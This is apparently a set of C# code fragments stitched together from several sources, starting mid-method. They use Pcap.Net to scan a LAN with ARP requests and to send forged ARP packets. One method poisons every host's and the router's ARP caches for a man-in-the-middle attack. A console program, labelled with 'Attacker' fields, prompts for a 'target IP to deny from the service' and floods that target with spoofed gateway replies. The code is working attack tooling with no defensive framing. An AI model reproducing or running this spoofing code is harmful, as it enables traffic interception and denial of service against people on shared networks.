i = 0; i < fragments.Count; i++) // { // IpV4Handler(fragments[i], fragments); // } } } }); } } catch (Exception e) { if (ThreadActive.IsSet) { ThreadActive.Reset(); Global.WriteLog("Load Balancer: " + Name + " has disconnected"); if (Global.Config.Gadget.Debug) { Global.WriteLog(e.ToString()); } Global.ShowTrayTip("Load Balancer", Name + " has disconnected", System.Windows.Forms.ToolTipIcon.Warning); } } }
private async void ArpAddresses() { _ipMacPairs.Clear(); var communicator = _deviceService.DeviceWithDescription.Device.Open(100, PacketDeviceOpenAttributes.Promiscuous, 1000); MacAddress source = new MacAddress(_deviceService.DeviceWithDescription.DeviceMacString.Replace('-', ':')); MacAddress destination = new MacAddress("ff:ff:ff:ff:ff:ff"); EthernetLayer ethernetLayer = new EthernetLayer { Source = source, Destination = destination, EtherType = EthernetType.None }; var ipVals = _deviceService.DeviceWithDescription.IpV4.Split('.').Select(x => byte.Parse(x)).ToArray(); ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Request, SenderHardwareAddress = Array.AsReadOnly(_deviceService.DeviceWithDescription.DeviceMacByte), SenderProtocolAddress = Array.AsReadOnly(ipVals), TargetHardwareAddress = Array.AsReadOnly(new byte[] { 0, 0, 0, 0, 0, 0 }), //TargetProtocolAddress = new byte[] { 192, 168, 1, 1 }, // 11.22.33.44. }; //IpV4Layer ipv4Layer = new IpV4Layer //{ // Source = new IpV4Address(Device.IpV4), // Ttl = 128 //}; //IcmpEchoLayer icmpLayer = new IcmpEchoLayer(); //PacketBuilder builder = new PacketBuilder(ethernetLayer, ipv4Layer, icmpLayer); PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer); await Task.Factory.StartNew(() => { for (var i = 1; ; ++i) { if (IsScanning == false) { break; } if (i >= 256) { i = 1; } if (i == ipVals[3]) { continue; } // Set IPv4 parameters arpLayer.TargetProtocolAddress = Array.AsReadOnly(new byte[] { 192, 168, 1, (byte)i }); //ipv4Layer.Identification = (ushort)i; //// Set ICMP parameters //icmpLayer.SequenceNumber = (ushort)i; //icmpLayer.Identifier = (ushort)i; // Build the packet Packet packet = builder.Build(DateTime.Now); Thread.Sleep(200); // Send down the packet communicator.SendPacket(packet); if (ScanTick != null) { ScanTick(this, (double)i / 255.0); } } }); communicator.Dispose(); }
public async void StartPoisoning() { IsPoisoning = true; var routerMac = _ipMacPairs.Single(x => x.Value == _deviceService.DeviceWithDescription.GatewayIpString).Key; if (string.IsNullOrEmpty(routerMac)) { throw new KeyNotFoundException(_deviceService.DeviceWithDescription.GatewayIpString); } var communicator = _deviceService.DeviceWithDescription.Device.Open(100, PacketDeviceOpenAttributes.Promiscuous, 1000); MacAddress source = new MacAddress(routerMac.Replace('-', ':')); EthernetLayer ethernetLayer = new EthernetLayer { //Source = source, //Destination = destination, EtherType = EthernetType.None }; ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4 }; PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer); await Task.Factory.StartNew(() => { while (true) { if (IsPoisoning == false) { break; } foreach (var kvp in _ipMacPairs) { if (kvp.Value != _deviceService.DeviceWithDescription.GatewayIpString) { ethernetLayer.Source = new MacAddress(_deviceService.DeviceWithDescription.DeviceMacString.Replace('-', ':')); ethernetLayer.Destination = new MacAddress(kvp.Key.Replace('-', ':')); arpLayer.Operation = ArpOperation.Request; arpLayer.SenderHardwareAddress = Array.AsReadOnly(_deviceService.DeviceWithDescription.DeviceMacByte); arpLayer.SenderProtocolAddress = Array.AsReadOnly(_deviceService.DeviceWithDescription.GatewayIpString.Split('.').Select(str => byte.Parse(str)).ToArray()); arpLayer.TargetHardwareAddress = Array.AsReadOnly(kvp.Key.Split('-').Select(str => Convert.ToByte(str, 16)).ToArray()); arpLayer.TargetProtocolAddress = Array.AsReadOnly(kvp.Value.Split('.').Select(str => byte.Parse(str)).ToArray()); Packet packet = builder.Build(DateTime.Now); communicator.SendPacket(packet); Thread.Sleep(2000); // spoof router ethernetLayer.Source = new MacAddress(_deviceService.DeviceWithDescription.DeviceMacString.Replace('-', ':')); ethernetLayer.Destination = new MacAddress(routerMac.Replace('-', ':')); arpLayer.Operation = ArpOperation.Request; arpLayer.SenderHardwareAddress = Array.AsReadOnly(_deviceService.DeviceWithDescription.DeviceMacByte); arpLayer.SenderProtocolAddress = Array.AsReadOnly(kvp.Value.Split('.').Select(str => byte.Parse(str)).ToArray()); arpLayer.TargetHardwareAddress = Array.AsReadOnly(routerMac.Split('-').Select(str => Convert.ToByte(str, 16)).ToArray()); arpLayer.TargetProtocolAddress = Array.AsReadOnly(_deviceService.DeviceWithDescription.GatewayIpString.Split('.').Select(str => byte.Parse(str)).ToArray()); packet = builder.Build(DateTime.Now); communicator.SendPacket(packet); Thread.Sleep(2000); } } } }); communicator.Dispose(); }
public arp() { IList<LivePacketDevice> allDevices = LivePacketDevice.AllLocalMachine; if ( allDevices.Count == 0 ) { Console.WriteLine( "No interfaces found! Make sure WinPcap is installed." ); return; } selectedDevice = allDevices[0]; getLocalMacAndIP( out ip, out mac ); ethernetLayer = new EthernetLayer { Source = new MacAddress( ToMac( mac.ToString() ) ), Destination = new MacAddress( "FF:FF:FF:FF:FF:FF" ), EtherType = EthernetType.None, // Will be filled automatically. }; arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Request, SenderHardwareAddress = Array.AsReadOnly( mac.GetAddressBytes().ToArray() ), // 03:03:03:03:03:03. SenderProtocolAddress = Array.AsReadOnly( ip ), // 1.2.3.4. TargetHardwareAddress = Array.AsReadOnly( new byte[] { 0, 0, 0, 0, 0, 0 } ), // 00:00:00:00:00:00. }; outputCommunicator = selectedDevice.Open( 100, PacketDeviceOpenAttributes.Promiscuous, 1000 ); }
static void Main(string[] args) { //Need to perform this because ARP table in Windows 10 gets updated with the falsified infos //This means if the program is ran, the host won't be able to browse the internet //netsh -c interface ipv4 add neighbors "Wi-Fi" "IP" "MAC" //netsh -c interface ipv4 delete neighbors "Wi-Fi" "IP" Console.CancelKeyPress += Console_CancelKeyPress; PhysicalAddress attackerMAC = null; IPAddress attackerIP = null; PhysicalAddress routerMAC = null; IPAddress routerGateway = null; IPAddress networkSubnetMask = null; string interfaceName = null; var networkInterface = NetworkInterfaceType.Wireless80211; foreach (NetworkInterface nic in NetworkInterface.GetAllNetworkInterfaces()) { if (nic.NetworkInterfaceType == networkInterface && nic.GetIPProperties().GatewayAddresses.Count > 0) { Console.WriteLine("Interface selected: " + nic.Name); interfaceName = nic.Name; attackerMAC = nic.GetPhysicalAddress(); routerGateway = nic.GetIPProperties().GatewayAddresses[0].Address; foreach (GatewayIPAddressInformation gateway in nic.GetIPProperties().GatewayAddresses) { if (gateway.Address.ToString().Split('.').Length == 4) { routerGateway = gateway.Address; } } foreach (UnicastIPAddressInformation UnicatIPInfo in nic.GetIPProperties().UnicastAddresses) { if (UnicatIPInfo.IPv4Mask.ToString() != "0.0.0.0") { attackerIP = UnicatIPInfo.Address; networkSubnetMask = UnicatIPInfo.IPv4Mask; break; } } } } Console.WriteLine(); Console.WriteLine("Attacker's MAC Address: " + FormatMACAddress(attackerMAC, ":")); Console.WriteLine("Attacker's LAN IP Address: " + attackerIP.ToString()); Console.WriteLine(); Console.WriteLine("Router's Gateway Address: " + routerGateway.ToString()); Console.WriteLine("LAN Subnet Mask: " + networkSubnetMask.ToString()); if (attackerMAC == null || attackerIP == null || networkSubnetMask == null || routerGateway == null) { Console.WriteLine("One or more details can't be retrieved! Program needs to exit!"); } else { byte[] rMAC = new byte[6]; int rlength = rMAC.Length; int result = SendARP(BitConverter.ToUInt32(routerGateway.GetAddressBytes(), 0), 0, rMAC, ref rlength); if (result == 0) { routerMAC = new PhysicalAddress(rMAC); Console.WriteLine("Router's MAC Address: " + FormatMACAddress(routerMAC, ":")); Console.WriteLine(); RunProgram("netsh", "interface ipv4 add neighbors \"" + interfaceName + "\" \"" + routerGateway.ToString() + "\" \"" + FormatMACAddress(routerMAC, "-") + "\""); Console.Write("Enter the target IP to deny from the service: "); IPAddress parsedInput = null; if (IPAddress.TryParse(Console.ReadLine(), out parsedInput)) { Console.WriteLine("Sending spoofed ARP packets to " + parsedInput.ToString()); Console.WriteLine("Press CTRL+C to exit gracefully"); byte[] bTargetMAC = new byte[6]; int tLength = bTargetMAC.Length; result = SendARP(BitConverter.ToUInt32(parsedInput.GetAddressBytes(), 0), 0, bTargetMAC, ref tLength); var targetMAC = new PhysicalAddress(bTargetMAC); EthernetLayer eLayer = new EthernetLayer(); eLayer.Source = new MacAddress(FormatMACAddress(attackerMAC, ":")); eLayer.Destination = new MacAddress(FormatMACAddress(targetMAC, ":")); eLayer.EtherType = EthernetType.Arp; ArpLayer aLayer = new ArpLayer(); aLayer.ProtocolType = EthernetType.IpV4; aLayer.Operation = ArpOperation.Reply; aLayer.SenderHardwareAddress = new ReadOnlyCollection <byte>(attackerMAC.GetAddressBytes()); aLayer.SenderProtocolAddress = new ReadOnlyCollection <byte>(routerGateway.GetAddressBytes()); aLayer.TargetHardwareAddress = new ReadOnlyCollection <byte>(targetMAC.GetAddressBytes()); aLayer.TargetProtocolAddress = new ReadOnlyCollection <byte>(parsedInput.GetAddressBytes()); Packet spoofedPacket = new PacketBuilder(eLayer, aLayer).Build(DateTime.Now); var lpDevices = LivePacketDevice.AllLocalMachine; foreach (var dev in lpDevices) { if (dev.Addresses[1].ToString().Contains(attackerIP.ToString())) { PacketCommunicator communicator = dev.Open(65536, PacketDeviceOpenAttributes.DataTransferUdpRemote, 1000); while (keepRunning) { communicator.SendPacket(spoofedPacket); Thread.Sleep(1000); } RunProgram("netsh", "interface ipv4 delete neighbors \"" + interfaceName + "\" \"" + routerGateway.ToString() + "\""); break; } } } else { Console.WriteLine("Input cannot be parsed correctly!"); } } else { Console.WriteLine("Could not retrieve router's MAC address!"); } } Console.WriteLine("Press any key to exit the program..."); Console.ReadLine(); }